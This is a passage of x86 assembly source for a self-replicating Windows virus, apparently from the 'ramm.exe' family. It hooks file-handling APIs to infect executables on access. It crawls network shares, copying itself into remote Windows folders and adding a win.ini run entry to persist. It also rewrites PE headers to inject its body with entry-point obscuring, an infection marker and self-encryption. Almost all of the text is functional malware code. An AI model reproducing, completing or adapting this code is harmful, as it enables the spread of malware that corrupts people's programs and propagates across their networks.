;
ExitProcessHooker proc ;
pusha ;
call ExitHookerEbp ;
ExitHookerEbp: ;
pop ebp ;
sub ebp, offset ExitHookerEbp ;
;
mov [ebp+process_end], 1 ;
@fo: cmp [ebp+fileopen], TRUE ;we cannot allow shutdown
je @fo ;while our thread has a
popa ;file opened...
ret ;
ExitProcessHooker endp ;
;
CreateFileHooker proc ;
pusha ;
pushfd ;
call CreateFileEbp ;
CreateFileEbp: ;
pop ebp ;
sub ebp, offset CreateFileEbp ;
mov eax, [esp+2ch+4+4+4+4] ;
cmp eax, OPEN_EXISTING ;
je good_to_infect ;
;
popfd ;
popa ;
ret ;
CreateFileHooker endp ;
;
HookedFunctions: ;
crc32 <CopyFileA> ;
dd offset Hook_CopyFileA ;
crc32 <CopyFileExA> ;
dd offset Hook_CopyFileExA ;
crc32 <CreateFileA> ;
dd offset Hook_CreateFileA ;
crc32 <GetCompressedFileSizeA> ;
dd offset Hook_GetCompressedFileSizeA ;
crc32 <GetFileAttributesA> ;
dd offset Hook_GetFileAttributesA ;
crc32 <GetFileAttributesExA> ;
dd offset Hook_GetFileAttributesExA ;
crc32 <SetFileAttributesA> ;
dd offset Hook_SetFileAttributesA ;
crc32 <GetFullPathNameA> ;
dd offset Hook_GetFullPathNameA ;
crc32 <MoveFileA> ;
dd offset Hook_MoveFileA ;
crc32 <MoveFileExA> ;
dd offset Hook_MoveFileExA ;
crc32 <OpenFile> ;
dd offset Hook_OpenFile ;
crc32 <CreateProcessA> ;
dd offset Hook_CreateProcessA ;
crc32 <WinExec> ;
dd offset Hook_WinExec ;
crc32 <XDestroyWindow> ;
dd offset Hook_DestroyWindow ;
crc32 <ExitProcess> ;
dd offset Hook_ExitProcess ;
functions_nr = ($-offset HookedFunctions)/8 ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Û This Thread is the Network Infector
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Thread_6_StartAddress proc PASCAL tdelta: dword ;
call @Thread6Delta ;
@Thread6Delta: ;
pop ebp ;
sub ebp, offset @Thread6Delta ;
;
IF NETWORKINFECTION ;
cmp [ebp+netapis], FALSE ;
je exit_netcrawl ;
;
IF THREAD6SEH ;
lea eax, [ebp+Thread6Exception] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
ENDIF ;
;
call NetInfection C, 0 ;
jmp done_net ;
;
NetInfection proc C lpnr:DWORD ;
;
local lpnrLocal :DWORD ;
local hEnum :DWORD ;
local ceEntries :DWORD ;
local cbBuffer :DWORD ;
;
pusha ;
call get_new_delta ;
get_new_delta: ;
pop edx ;
sub edx, offset get_new_delta ;
;
mov [ceEntries], 0FFFFFFFFh ;as many entries as poss.
mov [cbBuffer], 4000 ;memory buffer size
lea eax, [hEnum] ;handle to enumeration
mov esi, [lpnr] ;parameter
call [edx+_WNetOpenEnumA], RESOURCE_CONNECTED,\ ;open the enumeration
RESOURCETYPE_ANY, 0,\ ;
esi, eax ;
;
or eax, eax ;failed?
jnz exit_net ;
;
call [edx+_GlobalAlloc], GPTR, cbBuffer ;allocate memory
or eax, eax ;
jz exit_net ;
mov [lpnrLocal], eax ;save memory handle
;
enumerate: ;
lea eax, cbBuffer ;enumerate all the
push eax ;resources
mov esi, [lpnrLocal] ;
push esi ;
lea eax, ceEntries ;
push eax ;
push hEnum ;
call [edx+_WNetEnumResourceA] ;
;
or eax, eax ;failed?
jnz free_mem ;
;
mov ecx, [ceEntries] ;how many entries?
or ecx, ecx ;
jz enumerate ;
;
roam_net: ;
push ecx esi ;
;
mov eax, [esi.dwType] ;is it a disk resource?
test eax, RESOURCETYPE_DISK ;
jz get_next_entry ;
;
mov edi, [esi.lpRemoteName] ;get remote name
mov esi, [esi.lpLocalName] ;get local name
or esi, esi ;empty?
jz no_good_name ;
;
cmp word ptr [esi],0041 ;is it a floppy disk?
jz no_good_name ;
;
call RemoteInfection ;try to infect it!
;
no_good_name: ;
pop esi ;
;
mov eax, [esi.dwUsage] ;do we have a container?
test eax, RESOURCEUSAGE_CONTAINER ;
jz get_next_entry ;
;
push esi ;
call NetInfection ;recurse!!
;
get_next_entry: ;
add esi, 20h ;next resource!
pop ecx ;
loop roam_net ;
;
jmp enumerate ;and next enumeration...
;
free_mem: ;
call [edx+_GlobalFree], [lpnrLocal] ;free the memory
;
call [edx+_WNetCloseEnum], [hEnum] ;and close enumeration.
;
exit_net: ;
popa ;
ret ;
NetInfection endp ;
;
RemoteInfection proc ;
pusha ;
call @___1 ;restore the delta handle
@___1: ;
pop ebp ;
sub ebp, offset @___1 ;
;
push 260 ;get the current file
lea eax, [ebp+myname] ;name
push eax ;
push 0 ;
call [ebp+_GetModuleFileNameA] ;
or eax, eax ;
jz cannot_roam ;
;
lea esi, [ebp+windirs] ;point windows dir names
;
test_paths: ;
lea ebx, [ebp+droppername] ;copy path for dropper
call [ebp+_lstrcpy], ebx, edi ;
lea ebx, [ebp+winininame] ;copy path for win.ini
call [ebp+_lstrcpy], ebx, edi ;
;
lea ebx, [ebp+droppername] ;copy windows dir
call [ebp+_lstrcat], ebx, esi ;
lea eax, [ebp+drop] ;and dropper name
call [ebp+_lstrcat], ebx, eax ;
;
push TRUE ;now copy ourself over
push ebx ;the LAN under the new
lea eax, [ebp+myname] ;name into the remote
push eax ;windows directory
call [ebp+_CopyFileA] ;
or eax, eax ;
jz test_next ;
;
lea ebx, [ebp+winininame] ;copy the windows dir name
call [ebp+_lstrcat], ebx, esi ;to the win.ini path
lea eax, [ebp+winini] ;
call [ebp+_lstrcat], ebx, eax ;and it's name
;
lea eax, [ebp+winininame] ;Now create this entry
push eax ;into the win.ini file:
lea eax, [ebp+droppername] ;
push eax ;[Windows]
lea eax, [ebp+cmd] ;run=c:\windows\ramm.exe
push eax ;
inc esi ;
push esi ;
call [ebp+_WritePrivateProfileStringA] ;
jmp cannot_roam ;
;
test_next: ;
@endsz ;go and try the next
cmp byte ptr [esi], 0fh ;windows path!
jne test_paths ;
;
cannot_roam: ;
popa ;
ret ;
;
smash_dropper proc ;this procedure acts like
pusha ;this:
push 260 ;if the file ramm.exe
call ramm_name ;exists in the windows dir
r_n: db 260 dup(0) ;and there is no entry
ramm_name: ;to run it at next boot
call [ebp+_GetWindowsDirectoryA] ;in the win.ini file, then
;it will erase the file.
lea edx, [ebp+r_n] ;if the file ramm.exe
push edx ;does not exist, but there
call [ebp+_lstrlen] ;is an entry in the win
mov edi, eax ;ini file, then it will
;remove the entry.
lea eax, [ebp+drop] ;If both are present
push eax ;they are left alone.
lea edx, [ebp+r_n] ;
push edx ;
call [ebp+_lstrcat] ;
;
lea eax, [ebp+W32FD] ;locate ramm.exe
push eax ;
push edx ;
call [ebp+_FindFirstFileA] ;
mov [ebp+ok], 0 ;
cmp eax, INVALID_HANDLE_VALUE ;
je no_file ;
mov [ebp+ok], 1 ;
;
no_file: ;
lea edx, [ebp+r_n] ;save name
lea eax, [ebp+droppername] ;
push edx ;
push eax ;
call [ebp+_lstrcpy] ;
;
mov byte ptr [edx+edi], 0 ;
lea eax, [ebp+winini] ;
push eax ;
push edx ;
call [ebp+_lstrcat] ;
;open win.ini
push 0 ;
push 0 ;
push OPEN_EXISTING ;
push 0 ;
push 0 ;
push GENERIC_READ + GENERIC_WRITE ;
push edx ;
call [ebp+_CreateFileA] ;
inc eax ;
jz no_need ;
dec eax ;
mov [ebp+hfile], eax ;
;
push 0 ;
push eax ;
call [ebp+_GetFileSize] ;
mov [ebp+filesize], eax ;
;
push 0 ;
push [ebp+filesize] ;
push 0 ;
push PAGE_READWRITE ;
push 0 ;
push [ebp+hfile] ;
call [ebp+_CreateFileMappingA] ;
;
or eax, eax ;
jz no_need_1 ;
mov [ebp+hmap], eax ;
;
push [ebp+filesize] ;
push 0 ;
push 0 ;
push FILE_MAP_ALL_ACCESS ;
push [ebp+hmap] ;
call [ebp+_MapViewOfFile] ;
;
or eax, eax ;
jz no_need_2 ;
mov [ebp+haddress], eax ;
;
mov ecx, [ebp+filesize] ;
sub ecx, 8 ;
;
src_loop: ;
cmp dword ptr [eax] , 'mmar' ;search "ramm.exe"
jne no_ramm ;
cmp dword ptr [eax+4], 'exe.' ;
je found_ramm ;
;
no_ramm: ;
inc eax ;
loop src_loop ;
;
lea eax, [ebp+droppername] ;
push eax ;
call [ebp+_DeleteFileA] ;
jmp kill_memo ;
;
found_ramm: ;
cmp [ebp+ok], 0 ;
jne kill_memo ;
;
mov edx, eax ;
add edx, 8 ;
;
rep_for_run: ;
cmp [eax], "=nur" ;search backwards for
je finished_searching ;"run="
dec eax ;
cmp eax, [ebp+haddress] ;
je kill_memo ;
jmp rep_for_run ;
;
finished_searching: ;
mov edi, eax ;put blanks over it!
mov al, " " ;
mov ecx, edx ;
sub ecx, edi ;
rep stosb ;
;
kill_memo: ;
push [ebp+haddress] ;close win.ini!
call [ebp+_UnmapViewOfFile] ;
;
no_need_2: ;
push [ebp+hmap] ;
call [ebp+_CloseHandle] ;
;
no_need_1: ;
push [ebp+hfile] ;
call [ebp+_CloseHandle] ;
;
no_need: ;
popa ;
ret ;
smash_dropper endp ;
;
windirs db "\Windows", 0 ;
db "\WinNT" , 0 ;
db "\Win" , 0 ;
db "\Win95" , 0 ;
db "\Win98" , 0 ;
db 0fh ;
;
winini db "\Win.ini" , 0 ;
drop db "\ramm.exe", 0 ;
cmd db "run" , 0 ;
;
myname db 260 dup(0) ;
droppername db 260 dup(0) ;
winininame db 260 dup(0) ;
RemoteInfection endp ;
;
done_net: ;
IF THREAD6SEH ;
jmp restore_thread6_seh ;host
;
Thread6Exception: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecover6 ;
DeltaRecover6: ;
pop ebp ;
sub ebp, offset DeltaRecover6 ;
;
restore_thread6_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
ENDIF ;
;
ENDIF ;
;
exit_netcrawl: ;
push 0 ;
push 5 ;
push [ebp+hsemaphore] ;
call [ebp+_ReleaseSemaphore] ;
call [ebp+_ExitThread], 0 ;
Thread_6_StartAddress endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OurThreads dd offset Thread_1_StartAddress ;
dd offset Thread_2_StartAddress ;
dd offset Thread_3_StartAddress ;
dd offset Thread_4_StartAddress ;
dd offset Thread_5_StartAddress ;
dd offset Thread_6_StartAddress ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ReturnToHost: ;
jmp restore_seh ;host
;
ExceptionExit: ;if we had an error we
IF DEBUG ;
call MessageBoxA, 0, offset err, offset err, 0
jmp go_over ;
err db 'SEH Error!', 0 ;
go_over: ;
ELSE ;
ENDIF ;
mov esp, [esp+8] ;must restore the ESP
;
restore_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;returning to the host...
;
db 0BDh ;restore delta handle
delta dd 0 ;
;
cmp [ebp+firstgen], 1 ;
je generation0_exit ;
;
IF APIHOOK ;if api hook is on we
apicheck: ;cannot return to host
cmp [ebp+apihookfinish], 1 ;until the hooking is
jne apicheck ;done...
ENDIF ;
;
mov eax, 12345678h ;mov eax, oledip
oldeip equ $-4 ;
add eax, 12345678h ;add eax, imagebase
adjust equ $-4 ;
mov dword ptr [ebp+savedeax], eax ;
popa ;
;
push 12345678h ;
savedeax equ $-4 ;
ret ;
;
generation0_exit: ;
push 0 ;
call [ebp+_ExitProcess] ;
;
InfectFile proc ;
pusha ;save regs
mov [ebp+flag], 1 ;mark success flag
mov [ebp+filename], edi ;save filename
mov esi, edi ;
call ValidateFile ;
jc failed_infection ;
;
call [ebp+_GetFileAttributesA], edi ;get attributes
mov [ebp+fileattributes], eax ;and save them
call [ebp+_SetFileAttributesA], edi, FILE_ATTRIBUTE_NORMAL; and set
;them normal
call [ebp+_CreateFileA], edi, GENERIC_READ+GENERIC_WRITE, 0, 0,\
OPEN_EXISTING, 0, 0 ;open file
cmp eax, INVALID_HANDLE_VALUE ;
je finished ;
mov [ebp+hfile], eax ;
;
mov [ebp+fileopen], TRUE ;
;
lea ebx, [ebp+filetime1] ;save file time
push ebx ;
add ebx, 8 ;
push ebx ;
add ebx, 8 ;
push ebx ;
call [ebp+_GetFileTime], eax ;
;
call [ebp+_GetFileSize], [ebp+hfile], 0 ;get file size
mov [ebp+filesize], eax ;
add eax, virussize + 1000h ;
mov [ebp+additional], eax ;save additional length
;
call [ebp+_CreateFileMappingA], [ebp+hfile], 0, PAGE_READWRITE,\
0, [ebp+additional], 0
or eax, eax ;create mapping object
je close_file ;
;
mov [ebp+hmap], eax ;
;
call [ebp+_MapViewOfFile], [ebp+hmap], FILE_MAP_ALL_ACCESS, 0, 0,\
[ebp+additional] ;map file!
or eax, eax ;
je close_map ;
;
mov [ebp+haddress], eax ;save address of mapping
mov esi, eax ;
;
mov ax, word ptr [esi] ;check exe sign
xor ax, 'Úß' ;
cmp ax, 'ZM' xor 'Úß' ;
jne close_address ;
;
call InitCopro ;check infection mark
fild word ptr [esi.MZ_oeminfo] ;this is number a
fild word ptr [esi.MZ_oeminfo] ;
fmul ;
call RestoreCopro ;
add esp, 4 ;
;
mov esi, [esi.MZ_lfanew] ;get pointer to pe header
cmp esi, 1000h ;
ja close_address ;
add esi, [ebp+haddress] ;
;
call [ebp+_IsBadReadPtr], esi, 1000h ;check readability
or eax, eax ;
jnz close_address ;
;
mov [ebp+peheader], esi ;save pe header
;
mov ax, word ptr [esi] ;check if pe file
xor ax, 'õð' ;
cmp ax, 'EP' xor 'õð' ;
jne close_address ;
;
test word ptr [esi.Characteristics], IMAGE_FILE_DLL; be sure it's not
jnz close_address ;a library
;
lea edi, [ebp+pedata] ;
xor eax, eax ;
mov ax, [esi.NumberOfSections] ;save number of sections
stosd ;
mov ax, [esi.SizeOfOptionalHeader] ;save optional header
stosd ;
add esi, IMAGE_FILE_HEADER_SIZE ;get to the optional head.
mov [ebp+optionalheader], esi ;
;
cmp word ptr [esi.OH_MajorImageVersion], 0 ;
je skip_check ;
cmp word ptr [esi.OH_MinorImageVersion], 0 ;
je skip_check ;
call InitCopro ;
fild word ptr [esi.OH_MajorImageVersion] ;this is number b
fild word ptr [esi.OH_MajorImageVersion] ;
fmul ;
fild word ptr [esi.OH_MinorImageVersion] ;this is number c
fild word ptr [esi.OH_MinorImageVersion] ;
fmul ;
fadd ;
fsub ;here is b^2+c^2-a^2
fldz ;is it 0?
fcompp ;compare them
fstsw ax ;get status word
call RestoreCopro ;
add esp, 4 ;
sahf ;load flags with it
jz close_address ;is it already infected?
;
skip_check: ;
cmp [esi.OH_Subsystem], IMAGE_SUBSYSTEM_NATIVE; check if it is not
je close_address ;a driver...
;
mov eax, [esi.OH_AddressOfEntryPoint] ;save entry eip
stosd ;
mov eax, [esi.OH_ImageBase] ;imagebase
stosd ;
mov eax, [esi.OH_SectionAlignment] ;section align
stosd ;
mov eax, [esi.OH_FileAlignment] ;file align
stosd ;
mov eax, [esi.OH_SizeOfImage] ;size of image
stosd ;
mov eax, [esi.OH_SizeOfHeaders] ;headers size
stosd ;
mov eax, [esi.OH_CheckSum] ;and checksum
stosd ;
mov eax, [esi.OH_NumberOfRvaAndSizes] ;save number of dirs..
stosd ;
mov eax, [esi.OH_BaseOfCode] ;and base of code
stosd ;
;
add esi, [ebp+sizeofoptionalheader] ;mov to first sec header
mov ecx, [ebp+numberofsections] ;
;
scan_for_code: ;
mov eax, [esi.SH_VirtualAddress] ;get the RVA
cmp eax, [ebp+baseofcode] ;is it the code section?
jae found_code_section ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;no... get next...
loop scan_for_code ;
jmp close_address ;
;
found_code_section: ;
mov [ebp+codesectionheader], esi ;save code section ptr
mov [ebp+codesectionrva], eax ;
mov ebx, [esi.SH_PointerToRawData] ;
mov [ebp+codesectionraw], ebx ;
mov ebx, [esi.SH_VirtualSize] ;
mov eax, [esi.SH_SizeOfRawData] ;
call choose_smaller ;
mov [ebp+codesectionsize], ebx ;
;
;
IF APIHOOK ;
pusha ;
mov esi, [ebp+optionalheader] ;
mov ecx, [ebp+numberofsections] ;
mov ebx, [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
or ebx, ebx ;
jz over_import ;
add esi, [ebp+sizeofoptionalheader] ;
;
scan_for_imports: ;
mov eax, [esi.SH_VirtualAddress] ;get the RVA
cmp eax, ebx ;is it the import section?
je found_import ;
jb maybe_found ;
jmp search_next_import ;
;
maybe_found: ;
add eax, [esi.SH_VirtualSize] ;
cmp eax, ebx ;
ja found_import ;
;
search_next_import: ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;no... get next...
loop scan_for_imports ;
jmp no_import_found ;
;
found_import: ;enable write on the
or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE; imports, credits to
mov [ebp+no_imports], TRUE ;Bumblebee for this.
jmp over_import ;
;
no_import_found: ;
mov [ebp+no_imports], FALSE ;
;
over_import: ;
popa ;
ENDIF ;
call locate_last_section_stuff ;locate stuff in the last
;section
call add_new_section ;add a new section
jnc ok_go_with_it ;
;
call increase_last_section ;
mov edi, [ebp+finaldestination] ;
jmp do_virus_movement ;
;
ok_go_with_it: ;
mov eax, [esi.SH_SizeOfRawData] ;get the 2 sizes and be
cmp eax, virussize ;sure we are smaller then
jb set_method_1 ;both of them...
mov eax, [esi.SH_VirtualSize] ;
cmp eax, virussize ;
jb set_method_1 ;
;
size_is_ok: ;
cmp eax, virussize ;do we fit into the code
jb set_method_1 ;section?
;
mov [ebp+method], METHOD_MOVE_CODE ;if yes, move the code...
;
mov ecx, 5 ;
;
establish_home: ;
mov esi, [ebp+codesectionheader] ;
mov eax, [esi.SH_SizeOfRawData] ;
mov ebx, [esi.SH_VirtualSize] ;
call choose_smaller ;
mov ebx, [esi.SH_PointerToRawData] ;get pointer to data
mov [ebp+codesectionraw], ebx ;save it...
mov esi, ebx ;get a delta difference
IF RANDOMIZE_ENTRY ;
sub eax, virussize ;to place us in and
dec eax ;randomize it...
call brandom32 ;
ELSE ; ;
mov eax, 1 ;
ENDIF ;
mov [ebp+codedelta], eax ;from where we start?
;
call check_intersection ;are we intersecting with
jnc continue_process ;other directories?
loop establish_home ;if yes, try again!
;
jmp set_method_1 ;if cannot find place move
;at end!
;
continue_process: ;
add esi, eax ;
add esi, [ebp+haddress] ;
push esi ;
mov edi, [ebp+last_section_destination] ;save our destination...
add edi, [ebp+haddress] ;
call [ebp+_IsBadWritePtr], edi, virussize ;can we write?
or eax, eax ;
jnz close_address ;
call move_virus_size ;move the original code
pop edi ;from here...
mov [ebp+finaldestination], edi ;save the destination of
;code
do_virus_movement: ;
cmp [ebp+method], METHOD_INCREASE_LAST ;
jne not_increase_last ;
mov eax, [ebp+last_section_destination] ;
sub eax, [ebp+lastsectionraw] ;
add eax, [ebp+lastsectionrva] ;
jmp set_it ;
;
not_increase_last: ;
cmp [ebp+method], METHOD_APPEND_AT_END ;
jne not_at_end ;
mov eax, [ebp+lastsectionrva] ;
jmp set_it ;
;
not_at_end: ;
mov eax, [ebp+codesectionrva] ;
add eax, [ebp+codedelta] ;
;
set_it: ;
add eax, (ourpoint-start)-1 ;
mov dword ptr [ebp+ourpoint+1], eax ;for imagebase getter
;
mov eax, [ebp+last_section_destination] ;here is a raw ptr in the
sub eax, [ebp+lastsectionraw] ;last section. Substract
add eax, [ebp+lastsectionrva] ;raw pointer and add virt
mov dword ptr [ebp+codesource], eax ;pointer to get a RVA
mov eax, [ebp+finaldestination] ;same crap on destination
sub eax, [ebp+haddress] ;
sub eax, [ebp+codesectionraw] ;
add eax, [ebp+codesectionrva] ;
mov dword ptr [ebp+codedestin], eax ;
;
mov [ebp+copying], 1 ;syncronization
mov ecx, 100d ;
loop $ ;
;
lea esi, [ebp+start] ;move virus now in the
call move_virus_size ;code place...
mov [ebp+copying], 0 ;
;
mov eax, [ebp+addressofentrypoint] ;save old eip
mov edi, [ebp+finaldestination] ;
mov [edi+offset oldeip-offset start], eax ;
;
mov esi, [ebp+codesectionheader] ;
or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ
jmp continue ;make code writable
;
set_method_1: ;
mov [ebp+method], METHOD_APPEND_AT_END ;here we append the virus
;at the end...
mov edi, [ebp+last_section_destination] ;
add edi, [ebp+haddress] ;
mov [ebp+finaldestination], edi ;
call [ebp+_IsBadWritePtr], edi, virussize ;can we write?
or eax, eax ;
jnz close_address ;
jmp do_virus_movement ;
;
continue: ;
call check_not ;check lists
mov eax, [ebp+finaldestination] ;
add eax, (offset firstgen-offset start) ;zero the first gen mark
mov dword ptr [eax], 0 ;
;
mov esi, [ebp+optionalheader] ;now align size of image
mov eax, [ebp+sizeofimage] ;to the section alignment
add eax, [ebp+newsize] ;
cmp eax, [ebp+totalsizes] ;
jb sizeofimage_ok ;
;
call align_to_sectionalign ;
mov [esi.OH_SizeOfImage], eax ;
;
sizeofimage_ok: ;
mov eax, [ebp+filesize] ;align the filesize to
add eax, [ebp+newsize] ;the file alignment
call align_to_filealign ;
mov [ebp+filesize], eax ;
;
cmp [ebp+method], METHOD_APPEND_AT_END ;
je alternate ;
cmp [ebp+method], METHOD_INCREASE_LAST ;
je alternate2 ;
mov eax, [ebp+finaldestination] ;get our final destination
sub eax, [ebp+haddress] ;substract current map
sub eax, [ebp+codesectionraw] ;
add eax, [ebp+codesectionrva] ;
jmp set_eip ;
;
alternate2: ;
pusha ;
mov esi, [ebp+lastsectionheader] ;
mov eax, [esi.SH_VirtualSize] ;
xchg eax, [esi.SH_SizeOfRawData] ;
mov [esi.SH_VirtualSize], eax ;
popa ;
;
mov eax, [ebp+last_section_destination] ;
sub eax, [ebp+lastsectionraw] ;
add eax, [ebp+lastsectionrva] ;
call EPO_Routine ;
jnc set_epo ;
jmp set_eip ;
;
alternate: ;
mov eax, [ebp+lastsectionrva] ;
call EPO_Routine ;
jnc set_epo ;
jmp set_eip ;
;
set_epo: ;
pusha ;
mov ebx, [ebp+addressofentrypoint] ;
mov edx, ebx ;
add ebx, [ebp+codesectionraw] ;
sub ebx, [ebp+codesectionrva] ;
add ebx, [ebp+haddress] ;
sub eax, edx ;
sub eax, 5 ;
mov edx, dword ptr [ebx] ;
mov ecx, dword ptr [ebx+4] ;
mov byte ptr [ebx], 0e9h ;
mov dword ptr [ebx+1], eax ;
mov eax, [ebp+finaldestination] ;
add eax, (offset saved_code-offset start) ;
mov [eax], edx ;
mov [eax+4], ecx ;
popa ;
jmp mark_infection ;
;
set_eip: ;
mov [esi.OH_AddressOfEntryPoint], eax ;address and save eip RVA
;
mark_infection: ;
mov eax, 100d ;get random pythagora's
call brandom32 ;numbers roots
mov word ptr [ebp+m], ax ;m
mov eax, 100d ;
call brandom32 ;
mov word ptr [ebp+n], ax ;n
;
call InitCopro ;
fild word ptr [ebp+n] ;load the root numbers
fild word ptr [ebp+m] ;
fild word ptr [ebp+n] ;
fild word ptr [ebp+m] ;
fmul st, st(2) ;M*M
fincstp ;
fmul st, st(2) ;N*N
fdecstp ;
fadd st, st(1) ;M*M + N*N
fist word ptr [ebp+a] ;store it to a
fsub st, st(1) ;
fsub st, st(1) ;
fabs ;|M*M - N*N|
fist word ptr [ebp+c] ;store it to c
fincstp ;
fincstp ;
fmul ;
fimul word ptr [ebp+two] ;2*M*N
fist word ptr [ebp+b] ;store it to b
call RestoreCopro ;Now a^2 = b^2 + c^2
add esp, 4 ;
;
push esi ;mark infection!
mov esi, [ebp+haddress] ;
mov ax, [ebp+a] ;
mov word ptr [esi.MZ_oeminfo], ax ;
mov ax, [ebp+b] ;
pop esi ;
mov word ptr [esi.OH_MajorImageVersion], ax ;
mov ax, [ebp+c] ;
mov word ptr [esi.OH_MinorImageVersion], ax ;
;
mov eax, [ebp+sizeofheaders] ;rearrange size of headers
mov [esi.OH_SizeOfHeaders], eax ;
;
mov esi, [ebp+peheader] ;
;
cmp [ebp+method], METHOD_INCREASE_LAST ;
je no_need_to_increase ;
inc word ptr [esi.NumberOfSections] ;
;
no_need_to_increase: ;
IF CHECKSUM ;
mov eax, [esi.OH_CheckSum] ;
or eax, eax ;
jz no_checksum ;
;
mov ebx, [ebp+checksumfile] ;
or ebx, ebx ;
jz no_checksum ;
;
mov esi, [ebp+optionalheader] ;
mov eax, [esi.OH_CheckSum] ;
or eax, eax ;
jz no_checksum ;
lea eax, [esi.OH_CheckSum] ;
push eax ;
lea eax, [ebp+offset headersum] ;
push eax ;
push [ebp+filesize] ;
push [ebp+haddress] ;
call ebx ;
ELSE ;
mov esi, [ebp+optionalheader] ;
xor eax, eax ;
mov [esi.OH_CheckSum], eax ;
ENDIF ;
;
no_checksum: ;
mov esi, [ebp+finaldestination] ;our internal encryptor
add esi, (EncryptedArea - start) ;
mov edi, esi ;
mov ecx, (end2-EncryptedArea) ;
;
EncryptLoop: ;
lodsb ;
mov ebx, ecx ;
inc bl ;
jp _parity ;
rol al, cl ;
jmp do_encrypt ;
;
_parity: ;
ror al, cl ;
;
do_encrypt: ;
stosb ;
loop EncryptLoop ;
;
jmp infection_succesfull ;success!!! ;-)
;
m dw 0 ;
n dw 0 ;
a dw 0 ;
b dw 0 ;
c dw 0 ;
two dw 2 ;
;
move_virus_size: ;this moves as many bytes
mov ecx, virussize ;as the virus size is..
rep movsb ;
ret ;
;
;I found out today a very important thing... Some of the pe files inside
;the windows directory have a certain particularity that requires special
;care... That is some of the directories present in the DataDirectory have
;a RVA that falls inside the code section. This is the case for the
;Import Address Table (IAT), which for some file occurs at the beginning of
;the code section. If the virus places itself over that area, than, first of
;all the running of the original file will be faulted, and second of all, a
;part of the virus will be overwritten by the system at load and an error
;will occure for sure. In this situation the virus will check if any of
;the directories intersects it and if so, will try to get another random
;place. If it is not possible, the virus will go at end.
check_intersection: ;
pusha ;save registers!
mov edi, esi ;
add edi, eax ;
sub edi, [ebp+codesectionraw] ;
add edi, [ebp+codesectionrva] ;
;
mov esi, [ebp+optionalheader] ;
lea ebx, [esi.OH_DataDirectory] ;
push ecx ;
mov ecx, [ebp+numberofrva] ;how many directories?
mov edx, 0 ;index in directories.
;
check_directories: ;
pusha ;save all again!
mov esi, [ebx.edx.DD_VirtualAddress] ; x = X (esi)
or esi, esi ;
jz ok_next_dir ;
mov eax, esi ; x+y = Y (eax)
add eax, [ebx.edx.DD_Size] ;
;
mov ebx, edi ; a = A (edi)
add ebx, virussize ; a+b = B (ebx)
;
;We have to check if the interval (X,Y) intersects interval (A,B)
;
cmp esi, edi ; X<A?
jbe YYY1 ;
ja XXX1 ;
;
;
YYY1: ;
cmp eax, edi ;Y<A?
jbe ok_next_dir ;
jmp Intersect ;
;
XXX1: ;
cmp esi, ebx ;X>B?
jb Intersect ;
;
ok_next_dir: ;
popa ;
add edx, 8 ;
loop check_directories ;
pop ecx ;
popa ;
clc ;
ret ;
;
Intersect: ;
popa ;
pop ecx ;
popa ;
stc ;
ret ;
;
locate_last_section_stuff: ;
pusha ;
;
mov esi, [ebp+optionalheader] ;
add esi, [ebp+sizeofoptionalheader] ;
mov eax, [ebp+numberofsections] ;get number of sections
;
push eax esi ;first calculate the
mov ecx, eax ;
mov eax, [esi.SH_PointerToRawData] ;
mov [ebp+lowest_section_raw], eax ;lowest pointer to raw
xor edx, edx ;
;
compare_rva: ;
add edx, [esi.SH_VirtualSize] ;
mov eax, [esi.SH_PointerToRawData] ;
cmp [ebp+lowest_section_raw], eax ;
jbe next_compare ;
xchg [ebp+lowest_section_raw], eax ;
;
next_compare: ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
loop compare_rva ;
;
; add edx, [ebp+sizeofheaders] ;useless crap...
; mov [ebp+totalsizes], edx ;
;
pop esi eax ;
;
dec eax ;go for last
mov ecx, IMAGE_SIZEOF_SECTION_HEADER ;multiply with the size
xor edx, edx ;of a section
mul ecx ;
add esi, eax ;
mov [ebp+lastsectionheader], esi ;save pointer to header
mov eax, [esi.SH_VirtualAddress] ;
mov [ebp+lastsectionrva], eax ;
mov eax, [esi.SH_PointerToRawData] ;
mov [ebp+lastsectionraw], eax ;
mov eax, [esi.SH_SizeOfRawData] ;choose the smaller of
mov ebx, [esi.SH_VirtualSize] ;the sizes
; Major fix-up!! Many PE files mark in the section header a value which is
; much smaller than the real size of the data. The real value gets calculated
; somehow by the loader, so if we place at the end of one of the sizes we
; will probably overwrite data, so I will simply place it at the end of
; the file, even if this means increasing the infected victim.
;
; if you want to enable the placing in the last section cavity unmark the
; following lines:
;
; call choose_smaller ;
; or eax, eax ;if one is zero, try the
; jnz last_size_ok ;other; if both are 0...
; xchg eax, ebx ;
; or eax, eax ;
; jnz last_size_ok ;
;
consider_eof: ;...consider the EOF as
mov eax, [ebp+filesize] ;the last section dest.
jmp save_it ;
;
